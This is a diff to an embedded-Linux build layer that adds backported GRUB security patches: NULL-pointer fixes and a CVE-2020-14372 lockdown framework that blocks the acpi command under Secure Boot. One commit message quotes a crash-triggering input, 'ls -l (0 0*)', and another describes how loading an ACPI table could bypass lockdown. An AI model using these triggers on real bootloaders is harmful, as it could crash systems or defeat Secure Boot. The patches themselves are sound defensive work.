+From f5fb56954e5926ced42a980c3e0842ffd5fea2aa Mon Sep 17 00:00:00 2001
+From: Daniel Axtens <dja@axtens.net>
+Date: Fri, 3 Apr 2020 23:05:13 +1100
+Subject: [PATCH] script/execute: Fix NULL dereference in
+ grub_script_execute_cmdline()
+
+Signed-off-by: Daniel Axtens <dja@axtens.net>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=41ae93b2e6c75453514629bcfe684300e3aec0ce]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/script/execute.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/grub-core/script/execute.c b/grub-core/script/execute.c
+index 7e028e1..5ea2aef 100644
+--- a/grub-core/script/execute.c
++++ b/grub-core/script/execute.c
+@@ -940,7 +940,7 @@ grub_script_execute_cmdline (struct grub_script_cmd *cmd)
+ struct grub_script_argv argv = { 0, 0, 0 };
+
+ /* Lookup the command. */
+- if (grub_script_arglist_to_argv (cmdline->arglist, &argv) || ! argv.args[0])
++ if (grub_script_arglist_to_argv (cmdline->arglist, &argv) || ! argv.args || ! argv.args[0])
+ return grub_errno;
+
+ for (i = 0; i < argv.argc; i++)
diff --git a/meta/recipes-bsp/grub/files/0045-commands-ls-Require-device_name-is-not-NULL-before-p.patch b/meta/recipes-bsp/grub/files/0045-commands-ls-Require-device_name-is-not-NULL-before-p.patch
new file mode 100644
index 0000000000..5a327fe1d2
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0045-commands-ls-Require-device_name-is-not-NULL-before-p.patch
@@ -0,0 +1,33 @@
+From dd82f98fa642907817f59aeaf3761b786898df85 Mon Sep 17 00:00:00 2001
+From: Daniel Axtens <dja@axtens.net>
+Date: Mon, 11 Jan 2021 16:57:37 +1100
+Subject: [PATCH] commands/ls: Require device_name is not NULL before printing
+
+This can be triggered with:
+ ls -l (0 0*)
+and causes a NULL deref in grub_normal_print_device_info().
+
+I'm not sure if there's any implication with the IEEE 1275 platform.
+
+Signed-off-by: Daniel Axtens <dja@axtens.net>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=6afbe6063c95b827372f9ec310c9fc7461311eb1]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/commands/ls.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/grub-core/commands/ls.c b/grub-core/commands/ls.c
+index 5b7491a..326d2d6 100644
+--- a/grub-core/commands/ls.c
++++ b/grub-core/commands/ls.c
+@@ -196,7 +196,7 @@ grub_ls_list_files (char *dirname, int longlist, int all, int human)
+ goto fail;
+ }
+
+- if (! *path)
++ if (! *path && device_name)
+ {
+ if (grub_errno == GRUB_ERR_UNKNOWN_FS)
+ grub_errno = GRUB_ERR_NONE;
diff --git a/meta/recipes-bsp/grub/files/0046-script-execute-Avoid-crash-when-using-outside-a-func.patch b/meta/recipes-bsp/grub/files/0046-script-execute-Avoid-crash-when-using-outside-a-func.patch
new file mode 100644
index 0000000000..84117a9073
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0046-script-execute-Avoid-crash-when-using-outside-a-func.patch
@@ -0,0 +1,37 @@
+From df2505c4c3cf42b0c419c99a5f9e1ce63e5a5938 Mon Sep 17 00:00:00 2001
+From: Daniel Axtens <dja@axtens.net>
+Date: Mon, 11 Jan 2021 17:30:42 +1100
+Subject: [PATCH] script/execute: Avoid crash when using "$#" outside a
+ function scope
+
+"$#" represents the number of arguments to a function. It is only
+defined in a function scope, where "scope" is non-NULL. Currently,
+if we attempt to evaluate "$#" outside a function scope, "scope" will
+be NULL and we will crash with a NULL pointer dereference.
+
+Do not attempt to count arguments for "$#" if "scope" is NULL. This
+will result in "$#" being interpreted as an empty string if evaluated
+outside a function scope.
+
+Signed-off-by: Daniel Axtens <dja@axtens.net>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=fe0586347ee46f927ae27bb9673532da9f5dead5]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/script/execute.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/grub-core/script/execute.c b/grub-core/script/execute.c
+index 5ea2aef..23d34bd 100644
+--- a/grub-core/script/execute.c
++++ b/grub-core/script/execute.c
+@@ -485,7 +485,7 @@ gettext_putvar (const char *str, grub_size_t len,
+ return 0;
+
+ /* Enough for any number. */
+- if (len == 1 && str[0] == '#')
++ if (len == 1 && str[0] == '#' && scope != NULL)
+ {
+ grub_snprintf (*ptr, 30, "%u", scope->argv.argc);
+ *ptr += grub_strlen (*ptr);
diff --git a/meta/recipes-bsp/grub/files/CVE-2020-14309-CVE-2020-14310-CVE-2020-14311-malloc-Use-overflow-checking-primitives-where-we-do-.patch b/meta/recipes-bsp/grub/files/CVE-2020-14309-CVE-2020-14310-CVE-2020-14311-malloc-Use-overflow-checking-primitives-where-we-do-.patch
index 896a2145d4..7214ead9a7 100644
--- a/meta/recipes-bsp/grub/files/CVE-2020-14309-CVE-2020-14310-CVE-2020-14311-malloc-Use-overflow-checking-primitives-where-we-do-.patch
+++ b/meta/recipes-bsp/grub/files/CVE-2020-14309-CVE-2020-14310-CVE-2020-14311-malloc-Use-overflow-checking-primitives-where-we-do-.patch
@@ -30,7 +30,7 @@ Signed-off-by: Peter Jones <pjones@redhat.com>
Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
Upstream-Status: Backport
-CVE: CVE-2020-14309, CVE-2020-14310, CVE-2020-14311
+CVE: CVE-2020-14309 CVE-2020-14310 CVE-2020-14311
Reference to upstream patch:
https://git.savannah.gnu.org/cgit/grub.git/commit/?id=3f05d693d1274965ffbe4ba99080dc2c570944c6
diff --git a/meta/recipes-bsp/grub/files/CVE-2020-14372.patch b/meta/recipes-bsp/grub/files/CVE-2020-14372.patch
new file mode 100644
index 0000000000..08e7666cde
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2020-14372.patch
@@ -0,0 +1,76 @@
+From 0d237c0b90f0c6d4a3662c569b2371ae3ed69574 Mon Sep 17 00:00:00 2001
+From: Javier Martinez Canillas <javierm@redhat.com>
+Date: Mon, 28 Sep 2020 20:08:41 +0200
+Subject: [PATCH] acpi: Don't register the acpi command when locked down
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+The command is not allowed when lockdown is enforced. Otherwise an
+attacker can instruct the GRUB to load an SSDT table to overwrite
+the kernel lockdown configuration and later load and execute
+unsigned code.
+
+Fixes: CVE-2020-14372
+
+Reported-by: Máté Kukri <km@mkukri.xyz>
+Signed-off-by: Javier Martinez Canillas <javierm@redhat.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=3e8e4c0549240fa209acffceb473e1e509b50c95]
+CVE: CVE-2020-14372
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ docs/grub.texi | 5 +++++
+ grub-core/commands/acpi.c | 15 ++++++++-------
+ 2 files changed, 13 insertions(+), 7 deletions(-)
+
+diff --git a/docs/grub.texi b/docs/grub.texi
+index 0786427..47ac7ff 100644
+--- a/docs/grub.texi
++++ b/docs/grub.texi
+@@ -3986,6 +3986,11 @@ Normally, this command will replace the Root System Description Pointer
+ (RSDP) in the Extended BIOS Data Area to point to the new tables. If the
+ @option{--no-ebda} option is used, the new tables will be known only to
+ GRUB, but may be used by GRUB's EFI emulation.
++
++Note: The command is not allowed when lockdown is enforced (@pxref{Lockdown}).
++ Otherwise an attacker can instruct the GRUB to load an SSDT table to
++ overwrite the kernel lockdown configuration and later load and execute
++ unsigned code.
+ @end deffn
+
+
+diff --git a/grub-core/commands/acpi.c b/grub-core/commands/acpi.c
+index 5a1499a..1215f2a 100644
+--- a/grub-core/commands/acpi.c
++++ b/grub-core/commands/acpi.c
+@@ -27,6 +27,7 @@
+ #include <grub/mm.h>
+ #include <grub/memory.h>
+ #include <grub/i18n.h>
++#include <grub/lockdown.h>
+
+ #ifdef GRUB_MACHINE_EFI
+ #include <grub/efi/efi.h>
+@@ -775,13 +776,13 @@ static grub_extcmd_t cmd;
+
+ GRUB_MOD_INIT(acpi)
+ {
+- cmd = grub_register_extcmd ("acpi", grub_cmd_acpi, 0,
+- N_("[-1|-2] [--exclude=TABLE1,TABLE2|"
+- "--load-only=TABLE1,TABLE2] FILE1"
+- " [FILE2] [...]"),
+- N_("Load host ACPI tables and tables "
+- "specified by arguments."),
+- options);
++ cmd = grub_register_extcmd_lockdown ("acpi", grub_cmd_acpi, 0,
++ N_("[-1|-2] [--exclude=TABLE1,TABLE2|"
++ "--load-only=TABLE1,TABLE2] FILE1"
++ " [FILE2] [...]"),
++ N_("Load host ACPI tables and tables "
++ "specified by arguments."),
++ options);
+ }
+
+ GRUB_MOD_FINI(acpi)
diff --git a/meta/recipes-bsp/grub/files/CVE-2020-14372_1.patch b/meta/recipes-bsp/grub/files/CVE-2020-14372_1.patch
new file mode 100644
index 0000000000..745f335501
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2020-14372_1.patch
@@ -0,0 +1,130 @@
+From fe7a13df6200bda934fcc0246458df249f1ef4f2 Mon Sep 17 00:00:00 2001
+From: Marco A Benatto <mbenatto@redhat.com>
+Date: Wed, 23 Sep 2020 11:33:33 -0400
+Subject: [PATCH] verifiers: Move verifiers API to kernel image
+
+Move verifiers API from a module to the kernel image, so it can be
+used there as well. There are no functional changes in this patch.
+
+Signed-off-by: Marco A Benatto <mbenatto@redhat.com>
+Signed-off-by: Javier Martinez Canillas <javierm@redhat.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=9e95f45ceeef36fcf93cbfffcf004276883dbc99]
+CVE: CVE-2020-14372
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/Makefile.am | 1 +
+ grub-core/Makefile.core.def | 6 +-----
+ grub-core/kern/main.c | 4 ++++
+ grub-core/{commands => kern}/verifiers.c | 8 ++------
+ include/grub/verify.h | 9 ++++++---
+ 5 files changed, 14 insertions(+), 14 deletions(-)
+ rename grub-core/{commands => kern}/verifiers.c (97%)
+
+diff --git a/grub-core/Makefile.am b/grub-core/Makefile.am
+index 3ea8e7f..375c30d 100644
+--- a/grub-core/Makefile.am
++++ b/grub-core/Makefile.am
+@@ -90,6 +90,7 @@ KERNEL_HEADER_FILES += $(top_srcdir)/include/grub/parser.h
+ KERNEL_HEADER_FILES += $(top_srcdir)/include/grub/partition.h
+ KERNEL_HEADER_FILES += $(top_srcdir)/include/grub/term.h
+ KERNEL_HEADER_FILES += $(top_srcdir)/include/grub/time.h
++KERNEL_HEADER_FILES += $(top_srcdir)/include/grub/verify.h
+ KERNEL_HEADER_FILES += $(top_srcdir)/include/grub/mm_private.h
+ KERNEL_HEADER_FILES += $(top_srcdir)/include/grub/net.h
+ KERNEL_HEADER_FILES += $(top_srcdir)/include/grub/memory.h
+diff --git a/grub-core/Makefile.core.def b/grub-core/Makefile.core.def
+index 474a63e..cff02f2 100644
+--- a/grub-core/Makefile.core.def
++++ b/grub-core/Makefile.core.def
+@@ -140,6 +140,7 @@ kernel = {
+ common = kern/rescue_parser.c;
+ common = kern/rescue_reader.c;
+ common = kern/term.c;
++ common = kern/verifiers.c;
+
+ noemu = kern/compiler-rt.c;
+ noemu = kern/mm.c;
+@@ -942,11 +943,6 @@ module = {
+ cppflags = '-I$(srcdir)/lib/posix_wrap';
+ };
+
+-module = {
+- name = verifiers;
+- common = commands/verifiers.c;
+-};
+-
+ module = {
+ name = shim_lock;
+ common = commands/efi/shim_lock.c;
+diff --git a/grub-core/kern/main.c b/grub-core/kern/main.c
+index 9cad0c4..73967e2 100644
+--- a/grub-core/kern/main.c
++++ b/grub-core/kern/main.c
+@@ -29,6 +29,7 @@
+ #include <grub/command.h>
+ #include <grub/reader.h>
+ #include <grub/parser.h>
++#include <grub/verify.h>
+
+ #ifdef GRUB_MACHINE_PCBIOS
+ #include <grub/machine/memory.h>
+@@ -274,6 +275,9 @@ grub_main (void)
+ grub_printf ("Welcome to GRUB!\n\n");
+ grub_setcolorstate (GRUB_TERM_COLOR_STANDARD);
+
++ /* Init verifiers API. */
++ grub_verifiers_init ();
++
+ grub_load_config ();
+
+ grub_boot_time ("Before loading embedded modules.");
+diff --git a/grub-core/commands/verifiers.c b/grub-core/kern/verifiers.c
+similarity index 97%
+rename from grub-core/commands/verifiers.c
+rename to grub-core/kern/verifiers.c
+index 0dde481..aa3dc7c 100644
+--- a/grub-core/commands/verifiers.c
++++ b/grub-core/kern/verifiers.c
+@@ -217,12 +217,8 @@ grub_verify_string (char *str, enum grub_verify_string_type type)
+ return GRUB_ERR_NONE;
+ }
+
+-GRUB_MOD_INIT(verifiers)
++void
++grub_verifiers_init (void)
+ {
+ grub_file_filter_register (GRUB_FILE_FILTER_VERIFY, grub_verifiers_open);
+ }
+-
+-GRUB_MOD_FINI(verifiers)
+-{
+- grub_file_filter_unregister (GRUB_FILE_FILTER_VERIFY);
+-}
+diff --git a/include/grub/verify.h b/include/grub/verify.h
+index ea04914..cd129c3 100644
+--- a/include/grub/verify.h
++++ b/include/grub/verify.h
+@@ -64,7 +64,10 @@ struct grub_file_verifier
+ grub_err_t (*verify_string) (char *str, enum grub_verify_string_type type);
+ };
+
+-extern struct grub_file_verifier *grub_file_verifiers;
++extern struct grub_file_verifier *EXPORT_VAR (grub_file_verifiers);
++
++extern void
++grub_verifiers_init (void);
+
+ static inline void
+ grub_verifier_register (struct grub_file_verifier *ver)
+@@ -78,7 +81,7 @@ grub_verifier_unregister (struct grub_file_verifier *ver)
+ grub_list_remove (GRUB_AS_LIST (ver));
+ }
+
+-grub_err_t
+-grub_verify_string (char *str, enum grub_verify_string_type type);
++extern grub_err_t
++EXPORT_FUNC (grub_verify_string) (char *str, enum grub_verify_string_type type);
+
+ #endif /* ! GRUB_VERIFY_HEADER */
diff --git a/meta/recipes-bsp/grub/files/CVE-2020-14372_2.patch b/meta/recipes-bsp/grub/files/CVE-2020-14372_2.patch
new file mode 100644
index 0000000000..a98b5d0455
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2020-14372_2.patch
@@ -0,0 +1,431 @@
+From d8aac4517fef0f0188a60a2a8ff9cafdd9c7ca42 Mon Sep 17 00:00:00 2001
+From: Javier Martinez Canillas <javierm@redhat.com>
+Date: Mon, 28 Sep 2020 20:08:02 +0200
+Subject: [PATCH] kern: Add lockdown support
+
+When the GRUB starts on a secure boot platform, some commands can be
+used to subvert the protections provided by the verification mechanism and
+could lead to booting an untrusted system.
+
+To prevent that situation, allow GRUB to be locked down. That way the code
+may check if GRUB has been locked down and further restrict the commands
+that are registered or what subset of their functionality could be used.
+
+The lockdown support adds the following components:
+
+* The grub_lockdown() function which can be used to lockdown GRUB if,
+ e.g., UEFI Secure Boot is enabled.
+
+* The grub_is_lockdown() function which can be used to check if the GRUB
+ was locked down.
+
+* A verifier that flags OS kernels, the GRUB modules, Device Trees and ACPI
+ tables as GRUB_VERIFY_FLAGS_DEFER_AUTH to defer verification to other
+ verifiers. These files are only successfully verified if another registered
+ verifier returns success. Otherwise, the whole verification process fails.
+
+ For example, PE/COFF binaries verification can be done by the shim_lock
+ verifier which validates the signatures using the shim_lock protocol.
+ However, the verification is not deferred directly to the shim_lock verifier.
+ The shim_lock verifier is hooked into the verification process instead.
+
+* A set of grub_{command,extcmd}_lockdown functions that can be used by
+ code registering command handlers, to only register unsafe commands if
+ the GRUB has not been locked down.
+
+Signed-off-by: Javier Martinez Canillas <javierm@redhat.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=578c95298bcc46e0296f4c786db64c2ff26ce2cc]
+CVE: CVE-2020-14372
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ conf/Makefile.common | 2 +
+ docs/grub-dev.texi | 27 +++++++++++++
+ docs/grub.texi | 8 ++++
+ grub-core/Makefile.am | 5 ++-
+ grub-core/Makefile.core.def | 1 +
+ grub-core/commands/extcmd.c | 23 +++++++++++
+ grub-core/kern/command.c | 24 +++++++++++
+ grub-core/kern/lockdown.c | 80 +++++++++++++++++++++++++++++++++++++
+ include/grub/command.h | 5 +++
+ include/grub/extcmd.h | 7 ++++
+ include/grub/lockdown.h | 44 ++++++++++++++++++++
+ 11 files changed, 225 insertions(+), 1 deletion(-)
+ create mode 100644 grub-core/kern/lockdown.c
+ create mode 100644 include/grub/lockdown.h
+
+diff --git a/conf/Makefile.common b/conf/Makefile.common
+index 6cd71cb..2a1a886 100644
+--- a/conf/Makefile.common
++++ b/conf/Makefile.common
+@@ -84,7 +84,9 @@ CPPFLAGS_PARTTOOL_LIST = -Dgrub_parttool_register=PARTTOOL_LIST_MARKER
+ CPPFLAGS_TERMINAL_LIST = '-Dgrub_term_register_input(...)=INPUT_TERMINAL_LIST_MARKER(__VA_ARGS__)'
+ CPPFLAGS_TERMINAL_LIST += '-Dgrub_term_register_output(...)=OUTPUT_TERMINAL_LIST_MARKER(__VA_ARGS__)'
+ CPPFLAGS_COMMAND_LIST = '-Dgrub_register_command(...)=COMMAND_LIST_MARKER(__VA_ARGS__)'
++CPPFLAGS_COMMAND_LIST += '-Dgrub_register_command_lockdown(...)=COMMAND_LOCKDOWN_LIST_MARKER(__VA_ARGS__)'
+ CPPFLAGS_COMMAND_LIST += '-Dgrub_register_extcmd(...)=EXTCOMMAND_LIST_MARKER(__VA_ARGS__)'
++CPPFLAGS_COMMAND_LIST += '-Dgrub_register_extcmd_lockdown(...)=EXTCOMMAND_LOCKDOWN_LIST_MARKER(__VA_ARGS__)'
+ CPPFLAGS_COMMAND_LIST += '-Dgrub_register_command_p1(...)=P1COMMAND_LIST_MARKER(__VA_ARGS__)'
+ CPPFLAGS_FDT_LIST := '-Dgrub_fdtbus_register(...)=FDT_DRIVER_LIST_MARKER(__VA_ARGS__)'
+ CPPFLAGS_MARKER = $(CPPFLAGS_FS_LIST) $(CPPFLAGS_VIDEO_LIST) \
+diff --git a/docs/grub-dev.texi b/docs/grub-dev.texi
+index ee389fd..635ec72 100644
+--- a/docs/grub-dev.texi
++++ b/docs/grub-dev.texi
+@@ -86,6 +86,7 @@ This edition documents version @value{VERSION}.
+ * PFF2 Font File Format::
+ * Graphical Menu Software Design::
+ * Verifiers framework::
++* Lockdown framework::
+ * Copying This Manual:: Copying This Manual
+ * Index::
+ @end menu
+@@ -2086,6 +2087,32 @@ Optionally at the end of the file @samp{fini}, if it exists, is called with just
+ the context. If you return no error during any of @samp{init}, @samp{write} and
+ @samp{fini} then the file is considered as having succeded verification.
+
++@node Lockdown framework
++@chapter Lockdown framework
++
++The GRUB can be locked down, which is a restricted mode where some operations
++are not allowed. For instance, some commands cannot be used when the GRUB is
++locked down.
++
++The function
++@code{grub_lockdown()} is used to lockdown GRUB and the function
++@code{grub_is_lockdown()} function can be used to check whether lockdown is
++enabled or not. When enabled, the function returns @samp{GRUB_LOCKDOWN_ENABLED}
++and @samp{GRUB_LOCKDOWN_DISABLED} when is not enabled.
++
++The following functions can be used to register the commands that can only be
++used when lockdown is disabled:
++
++@itemize
++
++@item @code{grub_cmd_lockdown()} registers command which should not run when the
++GRUB is in lockdown mode.
++
++@item @code{grub_cmd_lockdown()} registers extended command which should not run
++when the GRUB is in lockdown mode.
++
++@end itemize
++
+ @node Copying This Manual
+ @appendix Copying This Manual
+
+diff --git a/docs/grub.texi b/docs/grub.texi
+index 8779507..d778bfb 100644
+--- a/docs/grub.texi
++++ b/docs/grub.texi
+@@ -5581,6 +5581,7 @@ environment variables and commands are listed in the same order.
+ * Using digital signatures:: Booting digitally signed code
+ * UEFI secure boot and shim:: Booting digitally signed PE files
+ * Measured Boot:: Measuring boot components
++* Lockdown:: Lockdown when booting on a secure setup
+ @end menu
+
+ @node Authentication and authorisation
+@@ -5794,6 +5795,13 @@ into @file{core.img} in order to avoid a potential gap in measurement between
+
+ Measured boot is currently only supported on EFI platforms.
+
++@node Lockdown
++@section Lockdown when booting on a secure setup
++
++The GRUB can be locked down when booted on a secure boot environment, for example
++if the UEFI secure boot is enabled. On a locked down configuration, the GRUB will
++be restricted and some operations/commands cannot be executed.
++
+ @node Platform limitations
+ @chapter Platform limitations
+
+diff --git a/grub-core/Makefile.am b/grub-core/Makefile.am
+index 375c30d..3096241 100644
+--- a/grub-core/Makefile.am
++++ b/grub-core/Makefile.am
+@@ -79,6 +79,7 @@ KERNEL_HEADER_FILES += $(top_srcdir)/include/grub/fs.h
+ KERNEL_HEADER_FILES += $(top_srcdir)/include/grub/i18n.h
+ KERNEL_HEADER_FILES += $(top_srcdir)/include/grub/kernel.h
+ KERNEL_HEADER_FILES += $(top_srcdir)/include/grub/list.h
++KERNEL_HEADER_FILES += $(top_srcdir)/include/grub/lockdown.h
+ KERNEL_HEADER_FILES += $(top_srcdir)/include/grub/misc.h
+ if COND_emu
+ KERNEL_HEADER_FILES += $(top_srcdir)/include/grub/compiler-rt-emu.h
+@@ -376,8 +377,10 @@ command.lst: $(MARKER_FILES)
+ b=`basename $$pp .marker`; \
+ sed -n \
+ -e "/EXTCOMMAND_LIST_MARKER *( *\"/{s/.*( *\"\([^\"]*\)\".*/*\1: $$b/;p;}" \
++ -e "/EXTCOMMAND_LOCKDOWN_LIST_MARKER *( *\"/{s/.*( *\"\([^\"]*\)\".*/*\1: $$b/;p;}" \
+ -e "/P1COMMAND_LIST_MARKER *( *\"/{s/.*( *\"\([^\"]*\)\".*/*\1: $$b/;p;}" \
+- -e "/COMMAND_LIST_MARKER *( *\"/{s/.*( *\"\([^\"]*\)\".*/\1: $$b/;p;}" $$pp; \
++ -e "/COMMAND_LIST_MARKER *( *\"/{s/.*( *\"\([^\"]*\)\".*/\1: $$b/;p;}" \
++ -e "/COMMAND_LOCKDOWN_LIST_MARKER *( *\"/{s/.*( *\"\([^\"]*\)\".*/\1: $$b/;p;}" $$pp; \
+ done) | sort -u > $@
+ platform_DATA += command.lst
+ CLEANFILES += command.lst
+diff --git a/grub-core/Makefile.core.def b/grub-core/Makefile.core.def
+index cff02f2..651ea2a 100644
+--- a/grub-core/Makefile.core.def
++++ b/grub-core/Makefile.core.def
+@@ -204,6 +204,7 @@ kernel = {
+ efi = term/efi/console.c;
+ efi = kern/acpi.c;
+ efi = kern/efi/acpi.c;
++ efi = kern/lockdown.c;
+ i386_coreboot = kern/i386/pc/acpi.c;
+ i386_multiboot = kern/i386/pc/acpi.c;
+ i386_coreboot = kern/acpi.c;
+diff --git a/grub-core/commands/extcmd.c b/grub-core/commands/extcmd.c
+index 69574e2..90a5ca2 100644
+--- a/grub-core/commands/extcmd.c
++++ b/grub-core/commands/extcmd.c
+@@ -19,6 +19,7 @@
+
+ #include <grub/mm.h>
+ #include <grub/list.h>
++#include <grub/lockdown.h>
+ #include <grub/misc.h>
+ #include <grub/extcmd.h>
+ #include <grub/script_sh.h>
+@@ -110,6 +111,28 @@ grub_register_extcmd (const char *name, grub_extcmd_func_t func,
+ summary, description, parser, 1);
+ }
+
++static grub_err_t
++grub_extcmd_lockdown (grub_extcmd_context_t ctxt __attribute__ ((unused)),
++ int argc __attribute__ ((unused)),
++ char **argv __attribute__ ((unused)))
++{
++ return grub_error (GRUB_ERR_ACCESS_DENIED,
++ N_("%s: the command is not allowed when lockdown is enforced"),
++ ctxt->extcmd->cmd->name);
++}
++
++grub_extcmd_t
++grub_register_extcmd_lockdown (const char *name, grub_extcmd_func_t func,
++ grub_command_flags_t flags, const char *summary,
++ const char *description,
++ const struct grub_arg_option *parser)
++{
++ if (grub_is_lockdown () == GRUB_LOCKDOWN_ENABLED)
++ func = grub_extcmd_lockdown;
++
++ return grub_register_extcmd (name, func, flags, summary, description, parser);
++}
++
+ void
+ grub_unregister_extcmd (grub_extcmd_t ext)
+ {
+diff --git a/grub-core/kern/command.c b/grub-core/kern/command.c
+index acd7218..4aabcd4 100644
+--- a/grub-core/kern/command.c
++++ b/grub-core/kern/command.c
+@@ -17,6 +17,7 @@
+ * along with GRUB. If not, see <http://www.gnu.org/licenses/>.
+ */
+
++#include <grub/lockdown.h>
+ #include <grub/mm.h>
+ #include <grub/command.h>
+
+@@ -77,6 +78,29 @@ grub_register_command_prio (const char *name,
+ return cmd;
+ }
+
++static grub_err_t
++grub_cmd_lockdown (grub_command_t cmd __attribute__ ((unused)),
++ int argc __attribute__ ((unused)),
++ char **argv __attribute__ ((unused)))
++
++{
++ return grub_error (GRUB_ERR_ACCESS_DENIED,
++ N_("%s: the command is not allowed when lockdown is enforced"),
++ cmd->name);
++}
++
++grub_command_t
++grub_register_command_lockdown (const char *name,
++ grub_command_func_t func,
++ const char *summary,
++ const char *description)
++{
++ if (grub_is_lockdown () == GRUB_LOCKDOWN_ENABLED)
++ func = grub_cmd_lockdown;
++
++ return grub_register_command_prio (name, func, summary, description, 0);
++}
++
+ void
+ grub_unregister_command (grub_command_t cmd)
+ {
+diff --git a/grub-core/kern/lockdown.c b/grub-core/kern/lockdown.c
+new file mode 100644
+index 0000000..1e56c0b
+--- /dev/null
++++ b/grub-core/kern/lockdown.c
+@@ -0,0 +1,80 @@
++/*
++ * GRUB -- GRand Unified Bootloader
++ * Copyright (C) 2020 Free Software Foundation, Inc.
++ *
++ * GRUB is free software: you can redistribute it and/or modify
++ * it under the terms of the GNU General Public License as published by
++ * the Free Software Foundation, either version 3 of the License, or
++ * (at your option) any later version.
++ *
++ * GRUB is distributed in the hope that it will be useful,
++ * but WITHOUT ANY WARRANTY; without even the implied warranty of
++ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
++ * GNU General Public License for more details.
++ *
++ * You should have received a copy of the GNU General Public License
++ * along with GRUB. If not, see <http://www.gnu.org/licenses/>.
++ *
++ */
++
++#include <grub/dl.h>
++#include <grub/file.h>
++#include <grub/lockdown.h>
++#include <grub/verify.h>
++
++static int lockdown = GRUB_LOCKDOWN_DISABLED;
++
++static grub_err_t
++lockdown_verifier_init (grub_file_t io __attribute__ ((unused)),
++ enum grub_file_type type,
++ void **context __attribute__ ((unused)),
++ enum grub_verify_flags *flags)
++{
++ *flags = GRUB_VERIFY_FLAGS_SKIP_VERIFICATION;
++
++ switch (type & GRUB_FILE_TYPE_MASK)
++ {
++ case GRUB_FILE_TYPE_GRUB_MODULE:
++ case GRUB_FILE_TYPE_LINUX_KERNEL:
++ case GRUB_FILE_TYPE_MULTIBOOT_KERNEL:
++ case GRUB_FILE_TYPE_XEN_HYPERVISOR:
++ case GRUB_FILE_TYPE_BSD_KERNEL:
++ case GRUB_FILE_TYPE_XNU_KERNEL:
++ case GRUB_FILE_TYPE_PLAN9_KERNEL:
++ case GRUB_FILE_TYPE_NTLDR:
++ case GRUB_FILE_TYPE_TRUECRYPT:
++ case GRUB_FILE_TYPE_FREEDOS:
++ case GRUB_FILE_TYPE_PXECHAINLOADER:
++ case GRUB_FILE_TYPE_PCCHAINLOADER:
++ case GRUB_FILE_TYPE_COREBOOT_CHAINLOADER:
++ case GRUB_FILE_TYPE_EFI_CHAINLOADED_IMAGE:
++ case GRUB_FILE_TYPE_ACPI_TABLE:
++ case GRUB_FILE_TYPE_DEVICE_TREE_IMAGE:
++ *flags = GRUB_VERIFY_FLAGS_DEFER_AUTH;
++
++ /* Fall through. */
++
++ default:
++ return GRUB_ERR_NONE;
++ }
++}
++
++struct grub_file_verifier lockdown_verifier =
++ {
++ .name = "lockdown_verifier",
++ .init = lockdown_verifier_init,
++ };
++
++void
++grub_lockdown (void)
++{
++ lockdown = GRUB_LOCKDOWN_ENABLED;
++
++ grub_verifier_register (&lockdown_verifier);
++}
++
++int
++grub_is_lockdown (void)
++{
++ return lockdown;
++}
+diff --git a/include/grub/command.h b/include/grub/command.h
+index eee4e84..2a6f7f8 100644
+--- a/include/grub/command.h
++++ b/include/grub/command.h
+@@ -86,6 +86,11 @@ EXPORT_FUNC(grub_register_command_prio) (const char *name,
+ const char *summary,
+ const char *description,
+ int prio);
++grub_command_t
++EXPORT_FUNC(grub_register_command_lockdown) (const char *name,
++ grub_command_func_t func,
++ const char *summary,
++ const char *description);
+ void EXPORT_FUNC(grub_unregister_command) (grub_command_t cmd);
+
+ static inline grub_command_t
+diff --git a/include/grub/extcmd.h b/include/grub/extcmd.h
+index 19fe592..fe9248b 100644
+--- a/include/grub/extcmd.h
++++ b/include/grub/extcmd.h
+@@ -62,6 +62,13 @@ grub_extcmd_t EXPORT_FUNC(grub_register_extcmd) (const char *name,
+ const char *description,
+ const struct grub_arg_option *parser);
+
++grub_extcmd_t EXPORT_FUNC(grub_register_extcmd_lockdown) (const char *name,
++ grub_extcmd_func_t func,
++ grub_command_flags_t flags,
++ const char *summary,
++ const char *description,
++ const struct grub_arg_option *parser);
++
+ grub_extcmd_t EXPORT_FUNC(grub_register_extcmd_prio) (const char *name,
+ grub_extcmd_func_t func,
+ grub_command_flags_t flags,
+diff --git a/include/grub/lockdown.h b/include/grub/lockdown.h
+new file mode 100644
+index 0000000..40531fa
+--- /dev/null
++++ b/include/grub/lockdown.h
+@@ -0,0 +1,44 @@
++/*
++ * GRUB -- GRand Unified Bootloader
